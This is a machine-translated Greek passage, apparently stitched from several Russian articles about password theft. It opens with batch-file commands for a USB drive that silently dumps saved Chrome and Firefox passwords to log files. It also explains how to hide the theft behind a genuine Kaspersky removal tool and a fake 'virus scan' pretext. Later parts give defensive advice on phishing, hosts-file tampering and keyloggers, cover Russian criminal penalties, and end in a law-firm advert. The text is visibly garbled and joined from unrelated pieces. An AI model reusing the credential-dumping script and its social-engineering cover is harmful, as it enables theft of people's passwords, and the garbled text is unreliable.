start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:Τέλος
startprog/KK.exe

Ας εξετάσουμε τις εντολές του αρχείου δέσμης με περισσότερες λεπτομέρειες:

echo off - απαγόρευση εξόδου στο παράθυρο CMD των αποτελεσμάτων εκτέλεσης

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt - γράψτε το όνομα υπολογιστή, το όνομα χρήστη, την ημερομηνία και την ώρα στο αρχείο prog/log/_log.txt

start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt - εκτελέστε το βοηθητικό πρόγραμμα ChromePass.exe, το οποίο, κατά την εκτέλεση, θα πρέπει να αποθηκεύσει τους κωδικούς πρόσβασης στο αρχείο prog/log/computername_chrom.txt

Το ίδιο ισχύει και για άλλα βοηθητικά προγράμματα. Η μόνη σημείωση είναι ότι πριν εκτελέσουμε το PasswordFox.exe, θα ελέγξουμε ότι το FF είναι καθόλου εγκατεστημένο στον υπολογιστή του θύματος. Απλώς, εάν το FF δεν είναι εγκατεστημένο, τότε το βοηθητικό πρόγραμμα PasswordFox.exe εμφανίζει ένα μήνυμα σφάλματος.

start prog/KK.exe - καλύπτουμε τις ενέργειές μας εκτελώντας ένα πραγματικό βοηθητικό πρόγραμμα για την κατάργηση του ιού τύπου worm Net-Worm.Win32.Kido από το Kaspersky Lab

Όλα - η μονάδα flash είναι έτοιμη. Τώρα ένας εισβολέας χρειάζεται απλώς να συνδέσει μια μονάδα flash στον υπολογιστή του θύματος και να επιλέξει "Σάρωση υπολογιστή για ιούς" στο αναδυόμενο παράθυρο που εμφανίζεται για την εξαγωγή όλων των αποθηκευμένων κωδικών πρόσβασης σε αυτόν τον υπολογιστή. Το σκεπτικό για την εκτέλεση μιας «σάρωσης ιών» είναι αρκετά απλό, ειδικά αν το θύμα σας εμπιστεύεται.

Πώς να πολεμήσετε;

1. Μην αποθηκεύετε κωδικούς πρόσβασης - είναι καλύτερο να χρησιμοποιήσετε κάποιο πρόγραμμα όπως το Password Keeper ή το eWallet.

3. Απαιτείται η παρουσία κανονικού antivirus! Αν και θα ορκιστεί μόνο σε μερικά από αυτά τα βοηθητικά προγράμματα.

Αφορμή για τη συγγραφή αυτού του άρθρου ήταν ένα σημείωμα στο περιοδικό «Hacker».

Αυτό το άρθρο έχει γραφτεί μόνο για ενημερωτικούς σκοπούς.
Σκοπός του είναι να προστατεύσει τα δεδομένα σας από έναν εισβολέα.
Όποιος γνωρίζει είναι οπλισμένος!

Η κλοπή κωδικών πρόσβασης άλλων συνεπάγεται ποινική ευθύνη σύμφωνα με το Μέρος 1 του άρθρου. 272 του Ποινικού Κώδικα της Ρωσικής Ομοσπονδίας "Παράνομη πρόσβαση σε πληροφορίες υπολογιστή" και απειλεί πραγματικόςφυλάκιση!

Τις τελευταίες ημέρες, οι ειδήσεις αναφέρουν ότι έχουν αναρτηθεί στο Διαδίκτυο στοιχεία σύνδεσης και κωδικοί πρόσβασης από εκατομμύρια γραμματοκιβώτια Google mail (Gmail), mail Yandex και mail.ru. Είναι αδύνατο να παραλάβετε οποιονδήποτε περισσότερο ή λιγότερο περίπλοκο κωδικό πρόσβασης, καθώς οι περισσότερες υπηρεσίες είναι ρυθμισμένες με τέτοιο τρόπο ώστε μετά από πολλά σφάλματα να ζητούν από τον χρήστη να εισάγει ένα captcha ή απλώς να μπλοκάρει την IP από την οποία εκτελείται ωμή επιβολή. Η συντριπτική πλειονότητα των διαρροών κωδικών πρόσβασης δεν φταίει για πονηρές εισβολές δημοφιλών υπηρεσιών, αλλά για τους ίδιους τους χρήστες, που επέτρεψαν την παραβίαση του κωδικού πρόσβασης. Ως εκ τούτου, θα ήθελα να θίξω το ερώτημα πώς οι χάκερ κλέβουν τους κωδικούς πρόσβασής σας και τι μπορεί να γίνει για να αποφευχθεί αυτό.

1. Ψεύτικες σελίδες σύνδεσης

Η ουσία είναι αυτή. Με οποιοδήποτε πρόσχημα, ο χρήστης παρασύρεται στον ιστότοπο ενός χάκερ. Συχνά, υπάρχει μόνο μία σελίδα σε αυτόν τον ιστότοπο, αλλά μοιάζει ακριβώς με την πραγματική σελίδα εξουσιοδότησης στο γραμματοκιβώτιό σας. Ένας απρόσεκτος χρήστης εισάγει ένα όνομα χρήστη και έναν κωδικό πρόσβασης, τα οποία πηγαίνουν κατευθείαν στον εισβολέα.

Πώς να πολεμήσετε:

- κάθε φορά που υπάρχει ανάγκη για εξουσιοδότηση, κοιτάξτε τον τομέα. Συχνά, οι εισβολείς μπορούν να δημιουργήσουν σύμφωνα ονόματα τομέα, για παράδειγμα:

www.mail.ru.free-host.net

www.yandex-ru.spb.ru

www.gmail-com.com

www.yandex.ru.mail.redte.ru

www.turian.ru/mail.ru

www.mail-compose.ru/yandex

145.35.77.1/mail.ru

Καθένας από αυτούς τους τομείς δεν έχει καμία σχέση με δημοφιλείς υπηρεσίες email. Κατά κανόνα, η εξουσιοδότηση δεν ζητείται κάθε φορά, επομένως, πριν εισαγάγετε έναν κωδικό πρόσβασης, αφιερώστε λίγο χρόνο στην έρευνα του ονόματος τομέα.

Ξεχωριστά, θα πρέπει να δώσετε προσοχή στο πώς οι χάκερ προσπαθούν να σας παρασύρουν στις κακόβουλες σελίδες τους. Θα δώσω μερικά παραδείγματα, αλλά δεν περιορίζονται σε επιλογές:

- λαμβάνετε ένα γράμμα στο ταχυδρομείο που σας ενημερώνει ότι λάβατε κάτι (μια καρτ ποστάλ ή κάτι άλλο ευχάριστο, ή αντίστροφα - κάτι πολύ δυσάρεστο και απαιτούνται οι άμεσες ενέργειες σας για να μην αποκλειστεί ο λογαριασμός σας, να μην χαθούν χρήματα κ.λπ.) και υπάρχει ένας σύνδεσμος που πρέπει να ακολουθήσετε.

- το SMS ενημερώνει ότι λάβατε ένα γράμμα και καλείστε να ακολουθήσετε τον σύνδεσμο για να διαβάσετε αυτό το γράμμα (έτσι ώστε ο εγκέφαλος να απενεργοποιηθεί στους άνδρες, μπορεί να διευκρινιστεί ότι το γράμμα είναι<любое женское имя>).

- σε αναδυόμενα παράθυρα σε ιστότοπους ή σε προγράμματα, αναφέρεται ότι έχετε λάβει ένα email.

Να το θυμάστε αυτό, απλά να είστε προσεκτικοί. Δώστε προσοχή στα μικρά πράγματα. Για παράδειγμα, συχνά επιλέγουμε την επιλογή "Αποθήκευση κωδικού πρόσβασης" στο πρόγραμμα περιήγησης και όταν μια πραγματική υπηρεσία αλληλογραφίας ζητά εκ νέου εξουσιοδότηση (αυτό συμβαίνει κατά καιρούς), τότε και τα δύο παράθυρα (τόσο σύνδεσης όσο και κωδικός πρόσβασης) είναι συχνά ήδη συμπληρωμένα και χρειάζεται μόνο να πατήσουμε το κουμπί σύνδεσης. Οι χάκερ μπορούν να εισαγάγουν το όνομα χρήστη σας (ειδικά αν σας έστειλαν με email έναν κακόβουλο σύνδεσμο), αλλά οι χάκερ δεν μπορούν να εισαγάγουν τον κωδικό πρόσβασής σας. Επομένως, εάν παρατηρήσετε ασυνήθιστη συμπεριφορά, ρίξτε μια προσεκτική ματιά στον τομέα. Εάν ο τομέας είναι σωστός, αλλά και πάλι κάτι δεν πάει καλά, τότε μπορεί να έχετε διαφορετικό πρόβλημα, το οποίο συζητείται στην επόμενη παράγραφο.

2. Ανακατεύθυνση μέσω αρχείου hosts

Κάθε υπολογιστής που εκτελεί το λειτουργικό σύστημα Windows έχει ένα αρχείο hosts που βρίσκεται στον κατάλογο C:WindowsSystem32Driversetc.

Εκεί μπορείτε να καταχωρήσετε μια ανακατεύθυνση. Ως αποτέλεσμα του οποίου ο τομέας στη γραμμή διευθύνσεων του προγράμματος περιήγησής σας θα είναι απολύτως αληθής, αλλά στην πραγματικότητα θα μεταφερθείτε στη σελίδα εξουσιοδότησης των χάκερ που, φυσικά, θα κλέψουν τον κωδικό πρόσβασής σας:

Τι να ψάξω:

- ανοίξτε το αρχείο C:WindowsSystem32Driversetchhosts με οποιοδήποτε πρόγραμμα επεξεργασίας κειμένου και κοιτάξτε το - δεν πρέπει να αναφέρονται δημοφιλείς τοποθεσίες ή κάτι ύποπτο.

- μια άλλη ένδειξη είναι ότι εισάγετε το σωστό όνομα χρήστη και κωδικό πρόσβασης, αλλά δεν πραγματοποιείται εξουσιοδότηση.

- στη σελίδα εξουσιοδότησης, σας ζητείται να στείλετε ένα SMS σε έναν σύντομο αριθμό με οποιοδήποτε πρόσχημα (επιβεβαίωση τηλεφώνου, προσπάθεια εισβολής και επιβεβαίωση ότι είστε εσείς, ο λογαριασμός δεν είναι ενεργός και θα διαγραφεί εάν δεν επιβεβαιωθεί, πρέπει να εισαγάγετε τους αριθμούς που λάβατε στο μήνυμα SMS απάντησης κ.λπ.).

Πώς να το αντιμετωπίσετε:

- συνήθως, το αρχείο hosts αλλάζει από ιούς, πρέπει να εγκαταστήσετε ένα πρόγραμμα προστασίας από ιούς, εάν δεν υπάρχει, και να ελέγξετε τον υπολογιστή. Εάν διαθέτετε πρόγραμμα προστασίας από ιούς, ενημερώστε το και ελέγξτε τον υπολογιστή σας.

- αφαιρέστε επιπλέον γραμμές από το αρχείο hosts

3. Προγράμματα παρακολούθησης πατημάτων πλήκτρων στο πληκτρολόγιο (kilogers)

Μια άλλη επιλογή είναι τα kiloheres. Πρόκειται για προγράμματα που παρεμποδίζουν όλα όσα πληκτρολογείτε στο πληκτρολόγιο και τα στέλνουν στον χάκερ. Στην πραγματικότητα, πρόκειται για ιούς και πρέπει να αντιμετωπίζετε αυτά τα προγράμματα με τον ίδιο τρόπο όπως και με άλλους ιούς. Εάν η αλληλογραφία σας "παραβιάζεται" συνεχώς, τότε ελέγξτε τον υπολογιστή σας με ένα πρόγραμμα προστασίας από ιούς, μην κάνετε λήψη ύποπτων εκτελέσιμων αρχείων (έχουν την επέκταση .exe, .msi, .hta, .scr, μπορεί να υπάρχουν κάποια άλλα, αλλά τις περισσότερες φορές ακόμα .exe). Εγκαταστήστε ένα πρόγραμμα προστασίας από ιούς που μπορεί να ενημερώνεται, ενημερώστε το τακτικά και ελέγξτε τον υπολογιστή σας (καλά ή μεταβείτε σε Linux).

Πώς να το αντιμετωπίσετε:

- εάν βρείτε ιό, τότε, για κάθε ενδεχόμενο, αλλάξτε τους κωδικούς πρόσβασής σας από την αλληλογραφία και τα κοινωνικά δίκτυα.

- αυτό έχει ήδη αναφερθεί, αλλά αυτό είναι τόσο συχνό λάθος που τονίζω ξανά, μην κάνετε λήψη εκτελέσιμων αρχείων από ύποπτες πηγές. Κατεβάστε τα από επίσημους ιστότοπους. Μην κατεβάζετε αρχεία που σας αποστέλλονται με ταχυδρομείο από αγνώστους (ακόμα και αν είναι φωτογραφίες "εγώ με μαγιό" κ.λπ.). Να είστε προσεκτικοί με τα εκτελέσιμα αρχεία, ακόμα κι αν αποστέλλονται από άτομα που γνωρίζετε - μπορεί να συμβεί ότι η αλληλογραφία τους παραβιάστηκε πριν από τη δική σας και για λογαριασμό τους ο χάκερ στέλνει τα κακόβουλα προγράμματά του.

- σε καφετέριες στο Διαδίκτυο και σε όλες τις περιπτώσεις που πρέπει να συνδεθείτε στον υπολογιστή κάποιου άλλου, χρησιμοποιήστε το πληκτρολόγιο οθόνης, αυτό δεν αποτελεί εγγύηση 100%, αλλά για πολλούς κιλοτέρ αυτή η στροφή θα είναι πολύ δύσκολη.

Ανεξάρτητα από το πόσο βαρετό μπορεί να ακούγεται, αλλά με τόσο ασήμαντους τρόπους οι περισσότεροι χρήστες χάνουν τους κωδικούς πρόσβασής τους και δεν λαμβάνουν χώρα ούτε περίπλοκες επιθέσεις χάκερ σε υπηρεσίες αλληλογραφίας ούτε περίπλοκη κρυπτανάλυση.

Δεν γνωρίζουν όλοι ότι η κλοπή ενός κωδικού πρόσβασης σε ένα κοινωνικό δίκτυο ή σε οποιονδήποτε άλλο διαδικτυακό πόρο είναι ποινικό αδίκημα. Πόσο αληθινή είναι μια τέτοια κλοπή, τι είδους τιμωρία μπορεί να λάβει ο δράστης για αυτήν και τι να κάνετε εάν γίνετε θύμα, θα πούμε παρακάτω.

Πόσο πραγματική είναι η κλοπή ενός κωδικού πρόσβασης Vkontakte;

Η κατοχή του κωδικού πρόσβασης VK είναι πολύ πραγματική, μια τέτοια κλοπή μπορεί να οδηγήσει σε αρνητικές συνέπειες για τον κάτοχο του λογαριασμού. Υπάρχουν πολλές ιστορίες στο Διαδίκτυο σχετικά με το πώς παραβιάστηκαν λογαριασμοί προκειμένου να ληφθούν προσωπικά στοιχεία ή να διαδοθούν πληροφορίες που δυσφημούν τη φήμη του κατόχου.

Η κλοπή πραγματοποιείται με διάφορους τρόπους:

• με χρήση phishing: ο χρήστης ανακατευθύνεται σε μια ψευδή σελίδα του ιστότοπου, όπου του ζητείται να εισαγάγει στοιχεία σύνδεσης και κωδικό πρόσβασης, τα οποία στη συνέχεια αναλαμβάνονται από τους εισβολείς.
• επιλέγοντας συνδυασμούς: αυτή η μέθοδος λειτουργεί εάν ο κωδικός πρόσβασης είναι πολύ απλός.
• ως αποτέλεσμα δόλιων ενεργειών από γνωστούς ή αγνώστους (όταν ο συνδυασμός απλώς κατασκοπεύτηκε σε υπολογιστή ή smartphone, εκμεταλλευόμενος την απουσία του κατόχου του gadget).

Σημείωση!

Ανεξάρτητα από τον τρόπο δράσης του επιτιθέμενου, τιμωρούνται ποινικά. Το corpus delicti σχηματίζεται σύμφωνα με το άρθ. 272 του Ποινικού Κώδικα της Ρωσικής Ομοσπονδίας (παράνομη πρόσβαση σε πληροφορίες υπολογιστή).

Τι να κάνετε αν σας έχουν χακάρει;

Εάν έχετε πέσει θύμα πειρατείας στο κοινωνικό δίκτυο Vkontakte ή οποιοδήποτε άλλο, τότε το πρώτο πράγμα που πρέπει να κάνετε είναι να επικοινωνήσετε με την υπηρεσία υποστήριξης ζητώντας να αποκλείσετε τον λογαριασμό σας. Ίσως χρειαστεί να προσκομίσετε κάποια στοιχεία ότι είστε ο κάτοχος του προφίλ.

Εάν ο κλεμμένος κωδικός έχει οριστεί κάπου αλλού, είτε πρόκειται για κοινωνικά δίκτυα, e-mail κ.λπ., τότε είναι απαραίτητο να αλλάξετε τους συνδυασμούς σε όλες τις άλλες υπηρεσίες.

Σημείωση!

Οι ειδικοί σε θέματα ασφάλειας υπολογιστών δεν συνιστούν να ορίσετε τον ίδιο κωδικό πρόσβασης σε διαφορετικούς ιστότοπους, επειδή σε τέτοιες περιπτώσεις, οι εισβολείς που έχουν καταλάβει έναν λογαριασμό μπορούν εύκολα να χακάρουν τους άλλους.

Όλοι οι φίλοι, οι συγγενείς και οι γνωστοί θα πρέπει να προειδοποιηθούν ότι το προφίλ σας έχει χακαριστεί. Οι εισβολείς μπορεί να προσπαθήσουν να στείλουν διάφορα μηνύματα εκ μέρους σας που περιέχουν κακόβουλους συνδέσμους ή αιτήματα για βοήθεια. Οι φίλοι σας μπορεί να υποφέρουν εάν πιστέψουν και κάνουν κλικ στον σύνδεσμο ή μεταφέρουν χρήματα στον λογαριασμό ή τον αριθμό κινητού τηλεφώνου που αναφέρεται στο μήνυμα.

Εάν σας έχει προκληθεί σοβαρή βλάβη από τις ενέργειες του δράστη, τότε είναι λογικό να επικοινωνήσετε με τις υπηρεσίες επιβολής του νόμου. Για να το κάνετε αυτό, θα χρειαστεί να γράψετε μια δήλωση στην αστυνομία, η οποία θα πρέπει να περιέχει ένα αίτημα για την προσαγωγή των δραστών στη δικαιοσύνη σύμφωνα με το άρθρο. 272 του Ποινικού Κώδικα της Ρωσικής Ομοσπονδίας. Σύμφωνα με αυτό το άρθρο, η μη εξουσιοδοτημένη πρόσβαση θα ποινικοποιηθεί μόνο εάν οι πληροφορίες ήταν:

• καταστράφηκε από;
• μπλοκαρισμένο?
• τροποποιήθηκε?
• αντιγράφηκε.

Λαμβάνοντας υπόψη το γεγονός ότι ο αποκλεισμός σημαίνει, μεταξύ άλλων, τη σκόπιμη παρεμπόδιση της πρόσβασης σε δεδομένα από νόμιμους χρήστες, η κλοπή κωδικού πρόσβασης VK εμπίπτει στις κυρώσεις του άρθρου. 272 του Ποινικού Κώδικα της Ρωσικής Ομοσπονδίας.

Για τέτοιες πράξεις προβλέπονται τα ακόλουθα είδη τιμωρίας:

• πρόστιμο έως 200.000 ρούβλια (ή στο ποσό του μισθού του παραβάτη για 18 μήνες).
• διορθωτική εργασία για έως και 1 έτος.
• περιορισμός της ελευθερίας, καταναγκαστική εργασία ή φυλάκιση έως 2 ετών.

Κατά την εξέταση της υπόθεσης, το δικαστήριο θα αποφασίσει ποια από τις αναφερόμενες ποινές θα επιβάλει. Θα εξαρτηθεί, μεταξύ άλλων, από τον βαθμό βλάβης που προκλήθηκε στον κάτοχο του λογαριασμού και σε άλλα άτομα. Εάν έχει προκληθεί μεγάλη ζημιά (με ποσό άνω του 1.000.000 ρούβλια), τότε το πρόστιμο μπορεί να αυξηθεί σε 300.000 ρούβλια και η ποινή φυλάκισης - έως και 4 χρόνια.

Σημείωση!

Μεγάλη ζημιά μπορεί να προκληθεί σε περίπτωση εισβολής του λογαριασμού μιας εμπορικής εταιρείας. Σε τέτοιες περιπτώσεις, μπορούμε επίσης να μιλήσουμε για την προστασία της επιχειρηματικής φήμης που έχει καταστραφεί ως αποτέλεσμα των ενεργειών των εισβολέων.

Πώς να προστατευτείτε από κλοπή κωδικού πρόσβασης;

Υπάρχουν σαφώς καθορισμένοι και κατανοητοί κανόνες για το πώς να συμπεριφέρεστε για να προστατευτείτε από την κλοπή:

• μην χρησιμοποιείτε πολύ απλούς συνδυασμούς, ειδικά αυτούς που αποτελούνται από την ημερομηνία γέννησής σας, το όνομα και το επίθετό σας κ.λπ. Σπάνε πολύ εύκολα. Λοιπόν, εάν ο κωδικός πρόσβασης αποτελείται από ένα σύνολο ασυνάρτητων γραμμάτων, αριθμών, πολλών σημείων στίξης.
• μην ακολουθείτε ύποπτους συνδέσμους, μην εισάγετε τα δεδομένα σας σε ύποπτους ιστότοπους.
• Μην αποθηκεύετε τους κωδικούς πρόσβασής σας σε άγνωστες συσκευές ή καλύτερα, μην τους αποθηκεύετε ποτέ σε προγράμματα περιήγησης.
• προσπαθήστε να μην συνδεθείτε στους λογαριασμούς σας από δημόσια δίκτυα wi-fi.
• εάν είναι δυνατόν, χρησιμοποιήστε ένα θησαυροφυλάκιο κωδικού πρόσβασης όπως το KeePass.

Εάν έχετε ήδη πέσει θύμα εισβολέων, επικοινωνήστε με τους δικηγόρους μας για βοήθεια. Θα βοηθήσουν σε όλα τα στάδια, από τη σύνταξη και την αποστολή δήλωσης στην αστυνομία και τη λήξη της δίκης. Καλέστε μας ή αφήστε το μήνυμά σας στον ιστότοπο.